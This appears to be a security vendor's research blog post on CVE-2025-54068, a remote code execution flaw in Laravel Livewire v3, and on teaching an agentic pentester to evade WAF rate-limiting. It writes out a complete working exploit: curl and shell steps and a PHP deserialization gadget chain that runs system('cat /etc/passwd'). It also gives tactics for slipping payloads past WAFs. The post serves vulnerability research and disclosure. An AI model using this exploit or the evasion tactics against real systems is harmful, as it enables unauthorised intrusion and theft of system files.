Research

mins read

April 16, 2026

Livewire to Livepyre - Exploitation Of An RCE In Mere Minutes

At Hadrian Security, our security researcher team is constantly developing new techniques, bypasses and original research. The team began looking into vulnerabilities that might have a higher false negative rate than others. This could be due to WAF blocks, custom setups, or techniques that require unique bypasses. Our goal was simple: How can we improve our automated solution to find more unique findings that customers want to see?

So the team set out to compile a list of fingerprints across our customers, and create a list of modules that have a low finding rate. Comparing them to the fingerprints we generated and the finding rate we produced, it gave us a sample set we were excited to work with. This is where Livewire comes in.

Laravel Livewire v3: A Deeper Look

Laravel Livewire is a PHP framework that empowers developers to build full-stack applications with the same ease of use as Vue or React. Straight from Livewire itself:

> "When an interaction occurs, Livewire makes an AJAX request to the server with the updated data."

The vulnerability stems from insufficient validation in the component hydration process, which handles the deserialization and updating of Livewire components during AJAX requests. NVD specifies: "When an attacker crafts malicious payloads to the Livewire update endpoint, the framework fails to properly sanitize input during component hydration. This allows injection of arbitrary PHP code that executes in the web server context without requiring authentication."

This hydration mechanism is fundamental to how Livewire operates, as stated on their website. The vulnerability exists in Livewire's component hydration and update mechanism, affecting applications using versions prior to 3.6.4 and is assigned CVE-2025-54068 with a CVSS score of 9.2 (Critical). All Laravel Livewire v3 installations from 3.0.0-beta.1 through 3.6.3 are vulnerable to this attack.

The Hadrian platform was able to detect multiple fingerprinted versions that would be vulnerable to CVE-2025-54068. Most of them already had risks identified, but the few discrepancies is what piqued the interest of our security team. What would cause a false negative? The team set up a vulnerable web application to test and find out.

Agentic Pentesting: Changing The Game

Agentic pentesting is a continuous improvement process, new models are released, new techniques are discovered and the agent must be trained. Security research is crucial to ensure our agentic pentester remains up to date for the latest attacks, and being able to bypass WAFs or common blocks is equally important when developing a new pentest module.

Digging into these potential false negative scenarios allowed us to understand why our agentic testing failed to find it. The most common occurrence? A strict WAF.

WAFs are a great mitigation technique and help promote a defense-in-depth strategy, but a WAF is not the end-all solution. Hadrian is very familiar with WAF blocks, and they often happen with continuous scanning services; this occurs for a number of reasons. Sometimes our IPs are flagged as malicious due to the nature of our scanning; other times we send payloads to a specific host and the WAF (rightfully) detects this as malicious. Human pentesters can pivot quickly to change strategy, rotate proxies or VPNs, and continue testing, but how could an agentic pentester adapt?

WAF Rate-Limiting: The Challenge

Our team realized fairly quickly after analyzing the HTTP request and response codes that there was WAF rate-limiting happening on some of these hosts. The WAF noticed that there were several payloads tested back-to-back that could be malicious and began blocking our agentic pentester.

Naturally the team had to teach the agentic tester to pivot, wait, and try again. After a week and a half of training and testing, the team was able to reliably reproduce results with multiple WAFs. We were able to bypass WAF rate-limiting by recognizing when we began receiving HTTP status code 429 "Too Many Requests."

The bypass strategy was straightforward:

When the agentic pentester began seeing specific response codes such as 429, it would "pause" testing on that endpoint for up to an hour, with strategic intervals checking baseline requests and comparing them to "malicious" requests. Once it deemed the rate-limiting to be over, it would shift testing strategies to be slower and more deliberate, sometimes manipulating the payload to be less detectable by traditional WAFs.

In the instance of Livewire, a common payload we would use to demonstrate our POC was cat /etc/passwd. However, /etc/passwd is a known target used in exploitation, and many WAFs would pick up on this. During testing, the agentic pentester would take into account common payloads and modify them to less obvious versions, such as whoami or pwd. This pivot proved successful, as numerous tests showed successful exploitation of the RCE due to these cues. Below is the steps the agent took to find this vulnerability:

Step 1: Fetch the page

curl -skL -c cookies.txt 'https://TARGET.TLD/' -o response.html

Step 2: Extract the CSRF token and update URI

Format A via data- attributes:

TOKEN=$(grep -oP 'data-csrf="\K[^"]+' response.html) UPDATE_URI=$(grep -oP 'data-update-uri="\K[^"]+' response.html)

Format B via livewireScriptConfig:

TOKEN=$(grep -o 'livewireScriptConfig = {[^;]*' response.html | grep -o '"csrf":"[^"]*"' | cut -d'"' -f4) UPDATE_URI=$(grep -o 'livewireScriptConfig = {[^;]*' response.html | grep -o '"uri":"[^"]*"' | cut -d'"' -f4)

Verify:

echo "TOKEN: $TOKEN" echo "URI: $UPDATE_URI"

Step 3: Extract a snapshot

grep -o 'wire:snapshot="[^"]*"' response.html | head -1 | \ sed 's/wire:snapshot="//;s/"$//' | \ php -r 'echo html_entity_decode(file_get_contents("php://stdin"));' > snapshot.json

Step 4: Inspect the snapshot to find exploitable parameters

php -r 'echo

json_encode(json_decode(file_get_contents("snapshot.json"))->data,

JSON_PRETTY_PRINT);'

Step 5: Build the payload (Note: you need to chain these since shell variables don't persist between commands)

php -r ' $token = $argv[1]; $snapshot = file_get_contents("snapshot.json"); $func = "system"; $cmd = "cat /etc/passwd"; $chain = "O:38:\"Illuminate\\Broadcasting\\BroadcastEvent\":4:{s:5:\"dummy\";O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"\x00*\x00events\";O:31:\"Illuminate\\Validation\\Validator\":1:{s:10:\"extensions\";a:1:{s:0:\"\";s:".strlen($func).":\"$func\";}}s:8:\"\x00*\x00event\";s:".strlen($cmd).":\"$cmd\";}s:10:\"connection\";N;s:5:\"queue\";N;s:5:\"event\";O:37:\"Illuminate\\Notifications\\Notification\":0:{}}"; $payload = [ "_token" => $token, "components" => [[ "snapshot" => $snapshot, "updates" => [ "data" => [1, [ [ "a" => [ [ "__toString" => "phpversion", "close" => [ [ [ ["chained" => [$chain]], ["s" => "form", "class" => "Illuminate\\Broadcasting\\BroadcastEvent"] ], "dispatchNextJobInChain" ], ["s" => "clctn", "class" => "Laravel\\SerializableClosure\\Serializers\\Signed"] ] ], ["s" => "clctn", "class" => "GuzzleHttp\\Psr7\\FnStream"] ], "b" => [ [ "__toString" => [ [ [null, ["s" => "mdl", "class" => "Laravel\\Prompts\\Terminal"]], "exit" ], ["s" => "clctn", "class" => "Laravel\\SerializableClosure\\Serializers\\Signed"] ] ], ["s" => "clctn", "class" => "GuzzleHttp\\Psr7\\FnStream"] ] ], ["class" => "League\\Flysystem\\UrlGeneration\\ShardedPrefixPublicUrlGenerator", "s" => "clctn"] ]] ], "calls" => [] ]] ]; echo json_encode($payload); ' "$TOKEN" > payload.json

Step 6: Send the exploit

curl -sk -bcookies.txt "https://TARGET.TLD${UPDATE_URI}" \ -H 'Content-Type: application/json' \ -d @payload.json

The Breakdown:

1. Livewire's update endpoint(/livewire/update) accepts JSON that tells it which component properties to update and what their new values are.

2. The wire:snapshot contains the server-side component state. Livewire < 3.6.4 doesn't cryptographically sign the snapshot, so an attacker can replay it as-is.

3. The updates field uses synth type markers (the "s" and "class" fields) to tell Livewire how to deserialize a value. By specifying classes like BroadcastEvent, the server is tricked into instantiating arbitrary PHP objects.

4. The gadget chain leverages PendingBroadcast, which calls dispatch() on its `$events` property set to a Validator whose extensions map points "" → system. When __toString fires, it ultimately calls system("cat /etc/passwd").

5. The response body is the raw output of the executed command.

‍

Real-World Impact

After deploying the latest agentic pentester to our production environment, it successfully discovered a missed RCE in one of our customer's applications. The WAF was very strict on this host, and most malicious requests were dropped or rate-limited as demonstrated by our tests in development. However, the new agent was able to quickly pivot and recognize the WAF limitations, bypassing them using similar techniques. Thanks to the agentic pentesting improvements, Hadrian was able to disclose this critical finding before threat actors could exploit it.

The Broader Implications

This discovery highlights several important realities in modern digital security:

WAFs are necessary but insufficient. While web application firewalls provide valuable protection against automated attacks and script kiddies, they cannot be relied upon as the sole defense mechanism. Sophisticated attacks, whether from skilled human adversaries or advanced automated systems, can adapt to circumvent rate-limiting and signature-based detection. Context also matters in exploitation. The Livewire vulnerability demonstrates why application-layer security cannot be solved by network-layer controls alone. The exploit leverages legitimate framework functionality (component hydration) in an unexpected way. To a WAF, these requests appear identical to normal Livewire traffic, complete with proper headers, CSRF tokens, and framework-specific fingerprints. Only a deep understanding of Livewire's internal component lifecycle reveals the vulnerability.

Automated security must evolve, just like human pentesters adapt, too. Traditional vulnerability scanners operate on static payloads and signature matching. Modern agentic systems can adapt their testing strategies in real-time, learning from defensive responses and adjusting their approach. This mimics how skilled penetration testers operate, but at the scale and consistency of automation. False negatives are a real risk. The importance of an agentic pentester allows both organizations to focus less on false positives alerts that aren't real vulnerabilities, and also false negatives, real vulnerabilities that go undetected, which could pose the greater danger. With the ability to have an agentic pentester adapt and pivot similiar to that of a human, the reduction of false negatives can allow security teams to be confident in their infrastructure and their solutions designed to monitor this. .

Conclusion

The journey from discovering a pattern of false negatives to successfully exploiting CVE-2025-54068 in production environments demonstrates the value of combining automated scanning with continuous security research. By teaching our agentic pentester to recognize and adapt to defensive measures, we've improved our ability to identify real-world vulnerabilities before threat actors can exploit them.

This vulnerability serves as a reminder that comprehensive attack surface management requires more than point-in-time scanning. It demands continuous monitoring, adaptive testing strategies, and the ability to evolve alongside defensive technologies, where shifting left isn’t just about creating security by design, but also introducing necessary measures such as 24/7 scanning that allows companies to ensure security is at the forefront, and not just a checklist item for compliance. As WAFs become more sophisticated, so too must the systems designed to validate security posture.

For organizations, the lesson is clear: defense-in-depth means exactly that. WAFs, scanners, and automated tools all play important roles, but none can replace timely patching and holistic security practices. The window between vulnerability disclosure and active exploitation continues to shrink, making rapid identification and remediation more critical than ever.